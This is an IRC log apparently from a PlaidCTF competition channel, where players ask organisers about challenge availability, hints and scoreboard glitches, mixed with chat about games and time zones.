  2451. (05:29:19) (stypr) dat mtpox
  2452. (05:29:24) (stypr) what does the pox say
  2453. (05:29:28) (stypr) mtpox mtpox
  2454. (05:29:35) ••• jOin: (c0ax) ([email protected])
  2455. (05:29:40) (c0ax) Hello there :)
  2456. (05:30:13) ••• qUit: (phiber_) ([email protected]) Ping timeout: 245 seconds
  2457. (05:30:16) (supersat) yo
  2458. (05:30:45) (pd7) is the rendezvous challenge up?
  2459. (05:31:54) ••• qUit: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250) Quit: Page closed
  2460. (05:32:22) (x7r0n) any1 whom i can ask about zfs ?
  2461. (05:32:41) (+frozencemetery) x7r0n: pm me
  2462. (05:32:57) (+frozencemetery) pd7: it appears to be working as intended
  2463. (05:33:00) (c0ax) anyone who can help me with web150? Im so close
  2464. (05:33:23) (pd7) frozencemetery: meaning I'm not supposed to be able to connect until I do something?
  2465. (05:33:50) (abc) who can help me web150
  2466. (05:34:06) (c0ax) Im searching help for that too
  2467. (05:34:12) (slinkyman) what have you done so far on web150?
  2468. (05:34:12) (Nanomebia) frozencemetery: is chronosphere supposed to be charged?(only two challenges open currently)
  2469. (05:34:15) (+frozencemetery) please refer to problems by their name (which is unique), not their category and number (not unique)
  2470. (05:34:27) (slinkyman) i'm assuming you mean mtpox
  2471. (05:34:35) ••• jOin: (sqall) ([email protected])
  2472. (05:35:03) ••• nIck: (Xor0X|afk) is now known as (Xor0X)
  2473. (05:36:06) (halfvollemelk) wow.. that epilepsy warning was no joke
  2474. (05:36:09) ••• jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
  2475. (05:36:29) (poppopret) i think im really close to web150 but im not sure what im doing wrong
  2476. (05:37:20) (stypr) is rendezvous working properly?
  2477. (05:39:04) (deject3d) are keys on servers supposed to be actually hard to find or obvious
  2478. (05:39:29) (+frozencemetery) keys are obviously keys
  2479. (05:39:36) (+frozencemetery) typically they involve l33tsp34k
  2480. (05:40:02) (foundation) is heartbleed up again?
  2481. (05:40:06) (deject3d) if there's a key inside a file on the server is it something like /home/whatever/key
  2482. (05:40:14) (c0ax) foundation, yep
  2483. (05:40:23) (foundation) o/ c0ax
  2484. (05:40:27) (c0ax) \o
  2485. (05:41:16) (chuckleberry) when i saw the key on web150 it didn't register with my stupid brain it was the key...
  2486. (05:41:19) (chuckleberry) :(
  2487. (05:41:32) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  2488. (05:42:44) (mak`) quick question about kpop anyone?
  2489. (05:42:55) ••• jOin: (tayacan) ([email protected])
  2490. (05:42:59) ••• jOin: (phiber_) ([email protected])
  2491. (05:43:07) ••• nIck: (tayacan) is now known as ([pwn]tayacan)
  2492. (05:43:38) ••• jOin: ([SF]testdata) (75c1ace7@gateway/web/freenode/ip.117.193.172.231)
  2493. (05:44:42) (deject3d) ok
  2494. (05:44:48) (stypr) we all love kpop.
  2495. (05:44:54) (deject3d) someones putting files in my meme folder
  2496. (05:44:59) (+frozencemetery) as the notice on heartbleed says, it's not up right now
  2497. (05:45:13) (+frozencemetery) pittsburgh kinda shuts down after 10pm, so there aren't really people around to steal hearts form
  2498. (05:45:35) ([SF]testdata) @frozencemetery : notice is no longer there
  2499. (05:46:12) ••• jOin: (jinblack) ([email protected])
  2500. (05:46:25) (+frozencemetery) [SF]testdata: you are right! We'll put it back
  2501. (05:47:07) ••• jOin: (admiral0) (83af1cc5@gateway/web/freenode/ip.131.175.28.197)
  2502. (05:47:27) ••• jOin: (corpille) ([email protected])
  2503. (05:47:31) ••• qUit: (x7r0n) (x7r0n@2002:75fe:a990::75fe:a990) Quit: Leaving
  2504. (05:47:56) (admiral0) hey ppp guys I got a grumpy no in my meme dir? What's the problem? I'm not damaging the system, just exploring
  2505. (05:47:56) ••• jOin: (netsurf3) ([email protected])
  2506. (05:48:29) ••• qUit: (qwasdf) (afc14aa8@gateway/web/freenode/ip.175.193.74.168) Quit: Page closed
  2507. (05:49:07) ••• qUit: (zeb23) ([email protected])
  2508. (05:49:30) ••• jOin: (Hertz_) ([email protected])
  2509. (05:49:33) (Aegil) with the hints on the instructions, if the hint is released where is that shown? is it added to the description or listed somewhere else?
  2510. (05:49:46) (ltfish) MSLC got over 1000 points all of a sudden
  2511. (05:49:53) (+clockish) ltfish: yeah we know
  2512. (05:50:01) (hellman) that was hidden challenge
  2513. (05:50:02) (+clockish) it's a bug on our side
  2514. (05:50:04) (zardus) many flags for whatscat!
  2515. (05:50:11) (ltfish) we wanna know what kind of vulns it is :P
  2516. (05:50:13) (zardus) gotta catch 'em all!
  2517. (05:50:16) (+clockish) hellman: was it intentional?
  2518. (05:50:17) (+frozencemetery) we will sanitize the data later
  2519. (05:50:18) (ltfish) it's interesting
  2520. (05:50:39) (+clockish) because it would be extra hilarious if that was intentional :)
  2521. (05:50:48) ••• jOin: (sevzero) ([email protected])
  2522. (05:51:49) (ryan-c) hm
  2523. (05:52:07) (mak`) clockish: got a second?
  2524. (05:52:14) (+clockish) mak` yeah sure
  2525. (05:52:23) (mak`) about kpop?
  2526. (05:52:25) (bobsteam) wow whatscat is making me feel dumb
  2527. (05:52:31) (zardus) 'night all
  2528. (05:52:41) (bobsteam) night zardus
  2529. (05:52:43) ••• qUit: (netsurf3) ([email protected]) Ping timeout: 252 seconds
  2530. (05:52:44) (+clockish) mak` people who actually know kpop are asleep, but I can try
  2531. (05:52:54) (+clockish) pm if there are spoilers
  2532. (05:53:04) ••• jOin: (irctc320) (83af1cc5@gateway/web/freenode/ip.131.175.28.197)
  2533. (05:53:23) ••• pArt: (irctc320) (83af1cc5@gateway/web/freenode/ip.131.175.28.197)
  2534. (05:53:31) ••• qUit: (virodoran) (uid2011@gateway/web/irccloud.com/x-xsqraopncqodiqvg) Quit: Connection closed for inactivity
  2535. (05:54:38) ••• jOin: (SeawolfRN) (5f95604f@gateway/web/cgi-irc/kiwiirc.com/ip.95.149.96.79)
  2536. (05:54:44) (deject3d) was the reekee challenge updated at all because i think there was a bug earlier
  2537. (05:54:51) (deject3d) but can't reproduce
  2538. (05:55:04) (+clockish) not updated any time within the last 5-6 hours for sure
  2539. (05:55:09) (deject3d) weird
  2540. (05:55:20) (Hertz_) http://play.plaidctf.com/profile/460
  2541. (05:55:35) (Hertz_) they solved
  2542. (05:55:36) (Hertz_) WhatsCat Web 300 8 minutes ago
  2543. (05:55:38) (Hertz_) like 6 times
  2544. (05:55:42) (Hertz_) race problem ?
  2545. (05:55:47) (SeawolfRN) does anyone else have their challenges all greyed out?
  2546. (05:55:51) (+clockish) Hertz_: yeah
  2547. (05:55:52) ••• qUit: (xp45g) ([email protected]) Quit: xp45g
  2548. (05:55:59) (+clockish) unfortunatley our DB people are asleep
  2549. (05:56:04) (stypr) they smoked chicken
  2550. (05:56:05) (+clockish) so it will stay like that until they wake up
  2551. (05:56:15) (stypr) so they must be high
  2552. (05:56:18) (+clockish) also MSLC are 1337 hackers, they probably pwned us :P
  2553. (05:56:34) ••• jOin: ([pwn]Idolf) ([email protected])
  2554. (05:57:47) (s_kunk) http://play.plaidctf.com/profile/460 <- what is this sorcery ?
  2555. (05:57:59) (pcc7) anyone working on nightmares?
  2556. (05:57:59) (s_kunk) 6x whatscat validations
  2557. (05:58:11) (sven) and they didn't even get #1 even with cheating :D
  2558. (05:59:22) ••• jOin: (whois) ([email protected])
  2559. (05:59:48) ••• qUit: (Gynvael) ([email protected]) Ping timeout: 245 seconds
  2560. (06:00:16) (admiral0) clockish: could you please stop trolling me on the django application?
  2561. (06:00:29) (deject3d) oh so i'm not the only one being trolled on that problem
  2562. (06:00:32) (+clockish) admiral0: I WILL NEVER STOP TROLLING
  2563. (06:00:42) (+clockish) Also, I didn't make any django apps, what's the issue?
  2564. (06:00:59) (fritz[]) kpop down?
  2565. (06:01:00) (deject3d) i spent time testing obama for stego
  2566. (06:01:03) (admiral0) clockish: somebody is changing the files in my meme user dir
  2567. (06:01:04) ••• qUit: (beugueuT4T) (4c871846ca@gateway/web/cgi-irc/kiwiirc.com/x-szfzakfsqubjpymb) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  2568. (06:01:23) (+clockish) admiral0: it's not us
  2569. (06:01:30) (deject3d) lol
  2570. (06:01:41) (+clockish) heh, we'll see
  2571. (06:01:48) (admiral0) clockish: uhm ok
  2572. (06:02:09) ••• jOin: (jaken) ([email protected])
  2573. (06:02:12) (deject3d) i just got the w3c css checkmark stamp of approval in my meme directory
  2574. (06:02:13) ••• jOin: (muchacho) ([email protected])
  2575. (06:02:21) (+frozencemetery) beautiful
  2576. (06:03:39) (+clockish) I just kicked the current shells and reset the problem
  2577. (06:04:05) (deject3d) no pls merciful prankster, upload key to my meme folder
  2578. (06:04:10) ••• jOin: (p4574) ([email protected])
  2579. (06:04:11) ••• jOin: (nullProtectorate) ([email protected])
  2580. (06:04:13) (zoff_ita) web300 down?
  2581. (06:04:27) ••• qUit: (saxx) ([email protected]) Ping timeout: 252 seconds
  2582. (06:04:35) ••• qUit: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155) Ping timeout: 240 seconds
  2583. (06:04:46) ••• jOin: ([1]Knight) ([email protected])
  2584. (06:04:56) ••• jOin: (Gynvael) ([email protected])
  2585. (06:05:02) ••• qUit: (f00b4r_) ([email protected]) Quit: f00b4r_
  2586. (06:05:16) ••• jOin: (HeadHunter1) ([email protected])
  2587. (06:05:41) ••• qUit: (HeadHunter) ([email protected]) Ping timeout: 276 seconds
  2588. (06:06:12) ••• jOin: (xp45g) ([email protected])
  2589. (06:06:12) ••• qUit: ([1]Knight) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- IRC with a difference
  2590. (06:06:16) ••• jOin: (kris) ([email protected])
  2591. (06:06:31) ••• jOin: ([1]Knight) ([email protected])
  2592. (06:07:07) ••• jOin: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
  2593. (06:07:27) (insanitybit) https://www.youtube.com/watch?v=AjPau5QYtYs
  2594. (06:07:31) (insanitybit) ^important
  2595. (06:07:51) (synthverity) ^^^^^^^^^^^^^
  2596. (06:08:35) ••• qUit: (nullProtectorate) ([email protected]) Ping timeout: 258 seconds
  2597. (06:08:41) (synthverity) Fucking safety man.
  2598. (06:08:47) (synthverity) Need a whole dance for it
  2599. (06:08:51) ••• qUit: (hu) ([email protected]) Ping timeout: 252 seconds
  2600. (06:08:58) ••• jOin: (f00b4r_) ([email protected])
  2601. (06:09:14) (bobsteam) Seems like whatscat might need a kick?
  2602. (06:09:23) ••• qUit: (HeadHunter1) ([email protected]) Ping timeout: 240 seconds
  2603. (06:09:34) (acez) who can I talk to for kapp ?
  2604. (06:09:43) (fritz[]) kpop isnt working, error 500
  2605. (06:09:48) (acez) kappa*
  2606. (06:10:12) (doom) are the services dropping any characters?
  2607. (06:10:24) (acez) kappa admin ? anyone ?
  2608. (06:10:31) ••• jOin: (mascot) ([email protected])
  2609. (06:11:42) (synthverity) Who stayed up the whole night?
  2610. (06:11:49) (bobsteam) bingbing
  2611. (06:11:58) (bobsteam) granted, west coast, only 4am
  2612. (06:12:22) (upb) west coast of africa?:P
  2613. (06:13:23) ••• jOin: (aassddff) (79a88098@gateway/web/freenode/ip.121.168.128.152)
  2614. (06:13:39) (bobsteam) .... yes, its currently 4am on the west coast of africa
  2615. (06:13:54) (deject3d) wow that chronosphere is powerful
  2616. (06:14:48) (poppopret) same
  2617. (06:14:50) (poppopret) in california
  2618. (06:15:00) (bobsteam) ^
  2619. (06:15:14) (+frozencemetery) bobsteam: one it, one moment
  2620. (06:16:23) (bobsteam) frozencemetery: ty :)
  2621. (06:16:34) (+frozencemetery) bobsteam: should be good to go; give it a moment just to be safe but yeah
  2622. (06:17:27) (acez) bobsteam: it's definitely not 4 am on the west coast of africa
  2623. (06:17:35) ••• qUit: (aassddff) (79a88098@gateway/web/freenode/ip.121.168.128.152) Ping timeout: 240 seconds
  2624. (06:18:32) (bobsteam) acez: true, was being a smart ass, sorry =)
  2625. (06:18:57) (upb) yeah i was trying tobe a smart ass too,forgot theres only 1continent intheworld
  2626. (06:19:28) (AnthraX101) Of course there's only one, everyone knows that. The continent of north korea.
  2627. (06:19:41) ••• jOin: (Ymgve) ([email protected])
  2628. (06:19:51) (bobsteam) maybe multiple continents, but never the same time in multiple time zones. WOuld have been better to call out north or south america. or get country specific (since north america has multiple countries, zomg)
  2629. (06:19:56) (bobsteam) but anyway ~_~
  2630. (06:20:05) (bobsteam) too many smart people in this irc =P
  2631. (06:20:20) ••• jOin: (netsurf3) ([email protected])
  2632. (06:20:22) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  2633. (06:20:42) ••• jOin: (saxx) ([email protected])
  2634. (06:21:05) ••• jOin: (qqqqqqqq) (b2ebfe2d@gateway/web/freenode/ip.178.235.254.45)
  2635. (06:21:16) ••• pArt: (mascot) ([email protected])
  2636. (06:23:25) (mak`) please fix your scorebord ;]
  2637. (06:24:00) ••• jOin: (CaIlou) ([email protected])
  2638. (06:25:40) (Redford) http://play.plaidctf.com/profile/460
  2639. (06:25:45) (Redford) nice solves :)
  2640. (06:25:56) (Tapyroe__) yay! :D finally scored some points lol
  2641. (06:26:04) (Redford) :D
  2642. (06:26:30) ••• jOin: (KT) ([email protected])
  2643. (06:26:59) (Redford) tylerni7, mserrano: plz fix it ;)
  2644. (06:27:00) (+frozencemetery) we will fix the database later; right now we are working on other things
  2645. (06:27:04) (Redford) ok
  2646. (06:27:14) (+frozencemetery) the two people you just hilighted are both asleep
  2647. (06:27:19) ••• jOin: (dct1) ([email protected])
  2648. (06:27:34) (Redford) kk
  2649. (06:27:41) ••• jOin: (_simo) ([email protected])
  2650. (06:28:37) ••• qUit: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd) Remote host closed the connection
  2651. (06:29:09) ••• qUit: ([1]Knight) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Chicks dig it
  2652. (06:30:18) ••• qUit: (dct1) ([email protected]) Remote host closed the connection
  2653. (06:30:23) ••• jOin: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd)
  2654. (06:31:42) ••• jOin: (be) (ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd)
  2655. (06:32:21) ••• jOin: (dct1) ([email protected])
  2656. (06:33:31) ••• nIck: (pctf_watcher) is now known as (scoreboard)
  2657. (06:33:42) ••• nIck: (scoreboard) is now known as (pctf_scoreboard)
  2658. (06:34:28) (insanitybit) so like the site is down for everyone right
  2659. (06:34:41) ••• qUit: (_bcc) ([email protected]) Ping timeout: 252 seconds
  2660. (06:35:06) (HENLEYbls) nope still up for me insanitybit
  2661. (06:35:13) (insanitybit) yeah nevermind got a 502
  2662. (06:35:18) (corpille) sometimes got 502
  2663. (06:35:24) (insanitybit) its up now
  2664. (06:35:25) (supersat) wtf... i can't write to the stack on tenement?
  2665. (06:35:29) ••• jOin: (mascot) ([email protected])
  2666. (06:35:37) (supersat) (or anywhere, actually)
  2667. (06:35:44) (pcc7) anyone workingon nightmares?
  2668. (06:35:46) (insanitybit) who needs to write
  2669. (06:35:48) (insanitybit) when you can read???
  2670. (06:36:50) (supersat) i'm just kind of baffled how that's possible
  2671. (06:37:34) ••• qUit: (CaIlou) ([email protected]) Quit: Leaving
  2672. (06:38:21) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
  2673. (06:38:45) ••• jOin: (CaIlou) ([email protected])
  2674. (06:39:16) (insanitybit) why
  2675. (06:39:27) (+frozencemetery) the site is up
  2676. (06:40:28) ••• jOin: (T1mb0) ([email protected])
  2677. (06:40:53) (bobsteam) ok cats has me cursing, going to bed. g'night all :)
  2678. (06:41:06) ••• jOin: (nofiki) ([email protected])
  2679. (06:43:05) ••• qUit: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60) Ping timeout: 240 seconds
  2680. (06:44:07) ([SF]testdata) @frozencemetery : any good news on heartbleed ?
  2681. (06:44:43) (+frozencemetery) [SF]testdata: hopefully up soon, but in the meantime maybe work on something else, sorry
  2682. (06:45:01) (+frozencemetery) hungover hearts don't bleed right, so we've got a bit of a shortage
  2683. (06:46:15) (+frozencemetery) [SF]testdata: it also says that in the problem description, so...
  2684. (06:47:18) (whois) whois 0xffa guys
  2685. (06:47:22) ([SF]testdata) lol .. alrighty .. we will await for them to rejuvenate soon ;)
  2686. (06:50:35) ••• qUit: (approximatehack) (7ab326bb@gateway/web/freenode/ip.122.179.38.187) Ping timeout: 240 seconds
  2687. (06:50:51) ••• jOin: (melanie) ([email protected])
  2688. (06:51:05) ••• qUit: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155) Ping timeout: 240 seconds
  2689. (06:57:01) ••• jOin: (Salutken) ([email protected])
  2690. (06:58:36) ••• jOin: (n00bz) ([email protected])
  2691. (07:00:32) ••• jOin: (nateloaf) ([email protected])
  2692. (07:01:27) ••• jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
  2693. (07:02:14) ••• qUit: (Salutken) ([email protected]) Ping timeout: 276 seconds
  2694. (07:03:33) ••• jOin: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250)
  2695. (07:03:45) (B1N4RY) I'm back! haha
  2696. (07:04:05) (n00bz) who i can pm about web150?
  2697. (07:04:07) ••• qUit: (f00b4r_) ([email protected]) Quit: f00b4r_
  2698. (07:04:12) (B1N4RY) Now ready to run through this fun CTF for the next 30 hours
  2699. (07:06:25) ••• qUit: (fritz[]) ([email protected]) Ping timeout: 252 seconds
  2700. (07:07:40) ••• qUit: (braoru) ([email protected]) Ping timeout: 255 seconds
  2701. (07:07:41) ••• jOin: (braoru_) ([email protected])
  2702. (07:09:47) ••• qUit: (kris) ([email protected]) Ping timeout: 240 seconds
  2703. (07:13:27) (+frozencemetery) n00bz: hit me
  2704. (07:13:38) ••• jOin: (NotoriousHUB) ([email protected])
  2705. (07:15:35) ••• qUit: (muchacho) ([email protected]) Ping timeout: 252 seconds
  2706. (07:15:35) ••• qUit: (pcc7) (72560111@gateway/web/freenode/ip.114.86.1.17) Ping timeout: 240 seconds
  2707. (07:19:23) ••• jOin: (HeadHunter) ([email protected])
  2708. (07:21:23) ••• jOin: (muchacho) ([email protected])
  2709. (07:21:38) (stypr) dat kpop
  2710. (07:21:46) (stypr) I like kpop but when it comes to pwnage
  2711. (07:21:48) (stypr) ..lol
  2712. (07:22:04) ••• qUit: (braoru_) ([email protected]) Ping timeout: 255 seconds
  2713. (07:22:28) ••• jOin: (nullProtectorate) ([email protected])
  2714. (07:23:01) ••• jOin: (pcc7) (ca780766@gateway/web/freenode/ip.202.120.7.102)
  2715. (07:24:59) ••• qUit: (whois) ([email protected]) Ping timeout: 240 seconds
  2716. (07:25:23) ••• qUit: (nofiki) ([email protected]) Quit: Leaving.
  2717. (07:25:44) (B1N4RY) stypr did you solve mtpox
  2718. (07:25:51) (stypr) no
  2719. (07:25:55) (stypr) do you think I did? lol
  2720. (07:25:59) (stypr) I am playing games now
  2721. (07:26:04) (B1N4RY) lol
  2722. (07:26:13) (B1N4RY) U play bf4?
  2723. (07:26:20) (stypr) I am not well today
  2724. (07:26:25) (stypr) no not bfs
  2725. (07:26:26) (B1N4RY) Hmm..
  2726. (07:26:50) (B1N4RY) Please don't tell me that you are one of those ****ing cod fanboiiieeesss...
  2727. (07:27:18) (pcc7) anyone working on nightmares,pyjail?
  2728. (07:27:38) (stypr) oh i play cod sometimes
  2729. (07:27:47) (stypr) with my friends in weekends
  2730. (07:28:02) (HENLEYbls) B1N4RY: I play BF4
  2731. (07:28:14) (stypr) I don't play those often
  2732. (07:28:14) ••• qUit: (muchacho) ([email protected]) Ping timeout: 276 seconds
  2733. (07:28:29) ••• qUit: (nectoo) ([email protected]) Quit: Leaving
  2734. (07:28:31) (B1N4RY) HENLEYbls: What's your origin nickname? Let me add u
  2735. (07:28:42) (HENLEYbls) on Xbox 360 soon to be xBox One
  2736. (07:28:43) (B1N4RY) stypr: You play ghosts?
  2737. (07:28:48) (stypr) nope
  2738. (07:28:50) (B1N4RY) oh...xbox 360
  2739. (07:28:54) (stypr) lol
  2740. (07:29:00) ••• jOin: (braoru) ([email protected])
  2741. (07:29:11) (HENLEYbls) HENLEYbls I believe
  2742. (07:29:11) (B1N4RY) stypr: Which cod do you play with ur friends?
  2743. (07:29:12) (stypr) I used to play LoL often but now I just play old games like mario
  2744. (07:29:20) ••• jOin: (nofiki) ([email protected])
  2745. (07:29:21) (B1N4RY) lol mario
  2746. (07:29:34) (HENLEYbls) Atari is where it's at :P
  2747. (07:29:45) (stypr) it's lame
  2748. (07:29:53) (+frozencemetery) AAAAAMMMMIIIIGAAAAAAAA
  2749. (07:29:56) (+frozencemetery) *ahem*, sorry
  2750. (07:29:58) (HENLEYbls) It's jokes!
  2751. (07:29:59) (B1N4RY) LoL is a great game too, but WoW, is just...soo f***ing addictive..
  2752. (07:30:07) (B1N4RY) AMIGA LOL
  2753. (07:30:22) ••• qUit: (SeawolfRN) (5f95604f@gateway/web/cgi-irc/kiwiirc.com/ip.95.149.96.79) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  2754. (07:30:28) ••• qUit: (zoff_ita) ([email protected]) Quit: Leaving.
  2755. (07:30:44) (neodyblue) is the heartbleed service up ?
  2756. (07:31:08) (B1N4RY) Is heartbleed about the recent OpenSSL vuln?
  2757. (07:31:39) (+frozencemetery) neodyblue: read the description
  2758. (07:31:48) (HENLEYbls) I would guess their are similarities yeah :P B1N4RY
  2759. (07:32:06) (+frozencemetery) heartbleed is actually about making the perfect Bloody Mary
  2760. (07:32:24) (HENLEYbls) Much confuse!
  2761. (07:32:36) ••• qUit: (abc) (7506549f@gateway/web/freenode/ip.117.6.84.159) Quit: Page closed
  2762. (07:33:07) (+frozencemetery) such "tomato juice"!
  2763. (07:34:14) ••• jOin: (Mshing0) ([email protected])
  2764. (07:34:34) ••• jOin: (kanghee) ([email protected])
  2765. (07:34:38) ••• nIck: (Xor0X) is now known as (Xor0X_pwn100)
  2766. (07:35:04) ••• jOin: (naam) ([email protected])
  2767. (07:36:18) ••• jOin: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128)
  2768. (07:37:01) ••• jOin: (whois) ([email protected])
  2769. (07:38:38) ••• qUit: (deject3d) ([email protected]) Quit: Computer has gone to sleep.
  2770. (07:39:47) ••• jOin: (sqrts|stephan) ([email protected])
  2771. (07:39:47) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  2772. (07:39:59) ••• qUit: (Gynvael) ([email protected]) Ping timeout: 240 seconds
  2773. (07:40:14) ••• jOin: (f00b4r_) ([email protected])
  2774. (07:40:19) ••• jOin: (naam) ([email protected])
  2775. (07:40:50) ••• jOin: (Yolanda) (uid29179@gateway/web/irccloud.com/x-hytlcbhzztqaifai)
  2776. (07:41:20) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  2777. (07:41:34) ••• jOin: (blankwall) ([email protected])
  2778. (07:41:37) ••• jOin: (nectoo) ([email protected])
  2779. (07:41:51) (synick) is there a tv channel this time?
  2780. (07:42:04) ••• jOin: (depierre) ([email protected])
  2781. (07:42:22) (c0ax) Anyone to give me first clue to Web200 reeekee
  2782. (07:42:29) ••• jOin: (Gynvael) ([email protected])
  2783. (07:42:45) (whois) what a tor prob
  2784. (07:43:09) (+frozencemetery) ur a tor prob
  2785. (07:43:09) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  2786. (07:43:13) (+frozencemetery) :)
  2787. (07:43:28) (hellman) board down?
  2788. (07:43:31) (whois) whois 0xffa
  2789. (07:43:40) ••• jOin: (naam) ([email protected])
  2790. (07:43:52) (+frozencemetery) site is up
  2791. (07:44:48) ••• qUit: (f00b4r_) ([email protected]) Ping timeout: 245 seconds
  2792. (07:46:43) (acez) any kappa person around ?
  2793. (07:47:29) ••• jOin: (fser) ([email protected])
  2794. (07:47:47) (fser) hi, is the tor challenge open?
  2795. (07:48:40) ••• jOin: (cybercybercyber) ([email protected])
  2796. (07:48:41) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  2797. (07:48:46) ••• jOin: (alvoha) ([email protected])
  2798. (07:48:49) ••• qUit: (krycek) ([email protected]) Quit: Leaving.
  2799. (07:49:05) ••• jOin: (naam) ([email protected])
  2800. (07:49:44) ••• jOin: (mib_129) (80eee88d@gateway/web/cgi-irc/kiwiirc.com/ip.128.238.232.141)
  2801. (07:49:59) (mib_129) Is the website down?
  2802. (07:50:28) (auscompgeek) no
  2803. (07:50:43) ••• jOin: (dwlewis) ([email protected])
  2804. (07:50:55) (mib_129) is this the correct site http://play.plaidctf.com/?
  2805. (07:51:12) (c0ax) y
  2806. (07:51:29) (auscompgeek) wait, maybe it is
  2807. (07:51:29) (mib_129) and we are sure its up?
  2808. (07:51:40) ••• jOin: (copyleft_) ([email protected])
  2809. (07:51:47) (auscompgeek) well, it's up from my end
  2810. (07:51:58) (mib_129) i just want a challenge!
  2811. (07:52:28) (auscompgeek) hm, isup.me says it's up
  2812. (07:52:39) (auscompgeek) isitup.org says it's down
  2813. (07:52:43) ••• qUit: (mekanismen) (~mek@unaffiliated/mekanismen) Ping timeout: 245 seconds
  2814. (07:52:47) (+frozencemetery) website is up
  2815. (07:52:50) (auscompgeek) wait, no, it's up
  2816. (07:52:55) (+frozencemetery) it will occasionally 500 error
  2817. (07:53:05) (+frozencemetery) as much as it pains me to say this, just try it again
  2818. (07:53:05) (auscompgeek) ah, ok
  2819. (07:53:05) ••• qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
  2820. (07:53:20) (auscompgeek) do you guys know why it's erroring on occasion?
  2821. (07:53:27) (mib_129) anybody link me a download to ezhp?
  2822. (07:53:28) ••• jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
  2823. (07:53:46) (+frozencemetery) no, hopefully one of our infra people will wake up soon
  2824. (07:53:47) (auscompgeek) c0ax: no, I can't give you any clues
  2825. (07:54:35) ••• qUit: (qqqqqqqq) (b2ebfe2d@gateway/web/freenode/ip.178.235.254.45) Ping timeout: 240 seconds
  2826. (07:54:47) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
  2827. (07:55:18) (bobsteam) is whatscat password reset actually supposed to send an email? or not really?
  2828. (07:55:41) ••• qUit: (mib_129) (80eee88d@gateway/web/cgi-irc/kiwiirc.com/ip.128.238.232.141) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  2829. (07:55:46) ••• jOin: (eastwolf2) ([email protected])
  2830. (07:56:09) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  2831. (07:56:44) ••• qUit: (gpp) ([email protected]) Remote host closed the connection
  2832. (07:56:55) ••• jOin: ([1]Knight) ([email protected])
  2833. (07:56:57) (eastwolf2) G++ is my favorite so far :)
  2834. (07:57:08) (foundation) is ezhp down ?
  2835. (07:57:27) (upb) bobsteam: it did send multiple to mewhen i tested :)
  2836. (07:57:46) ••• jOin: (JustMeAsd) ([email protected])
  2837. (07:58:16) (bobsteam) upb: thanks, I haven't seen any. Maybe I need to figure that out. thx
  2838. (07:58:43) (+frozencemetery) we are looking into ezhp; please bear with us
  2839. (07:58:48) (foundation) k
  2840. (07:58:53) (foundation) tnx
  2841. (07:59:09) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Client Quit
  2842. (08:00:59) (mak`) who can i talk to about reekee?
  2843. (08:01:00) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  2844. (08:02:04) ••• qUit: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd) Remote host closed the connection
  2845. (08:02:06) ••• qUit: (nagi_) (72cd2aad@gateway/web/freenode/ip.114.205.42.173) Quit: Page closed
  2846. (08:02:37) (+frozencemetery) mak`: me, what's up?
  2847. (08:02:40) (+frozencemetery) (pm)
  2848. (08:02:49) ••• jOin: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd)
  2849. (08:06:00) (fser) whatscat db was cleared?
  2850. (08:06:41) ••• jOin: (naam) ([email protected])
  2851. (08:08:46) (+frozencemetery) fser: we have to reset it every so often because web scale demands personal sacrifice of our pets
  2852. (08:08:52) ••• qUit: (raudi) ([email protected]) Quit: Miranda IM! Smaller, Faster, Easier. http://miranda-im.org
  2853. (08:09:52) (fser) ok
  2854. (08:10:06) (fser) frozencemetery: do you know about rendezvous beeing up or not?
  2855. (08:10:11) (fser) can't reach that .onion
  2856. (08:10:25) (+frozencemetery) that problem is working as intended
  2857. (08:10:36) (fser) ok :-)
  2858. (08:10:51) (fser) thanks!
  2859. (08:15:49) (+frozencemetery) np
  2860. (08:16:08) (+mserrano) goddamn it leetmore
  2861. (08:16:10) (+mserrano) y u do dis
  2862. (08:16:32) (hellman) wasn't it the bonus challenges? :|
  2863. (08:16:49) (+mserrano) lol
  2864. (08:16:58) (+mserrano) I really don't know how that even happens
  2865. (08:17:23) ••• qUit: (AnthraX101) ([email protected]) Ping timeout: 258 seconds
  2866. (08:17:29) (hellman) btw i still have site empty :(
  2867. (08:17:38) (+mserrano) hellman: the main site?
  2868. (08:17:51) (+mserrano) hellman: also, I deleted 5 of your 6 solutions of whatscat
  2869. (08:17:52) (+frozencemetery) foundation: ezhp should be back up now
  2870. (08:18:07) (+mserrano) I assume that that was not intentional and was just a hilarious side effect of the site getting real slow
  2871. (08:18:39) (hellman) mserrano: yes
  2872. (08:18:39) (foundation) frozencemetery: it is, thanks
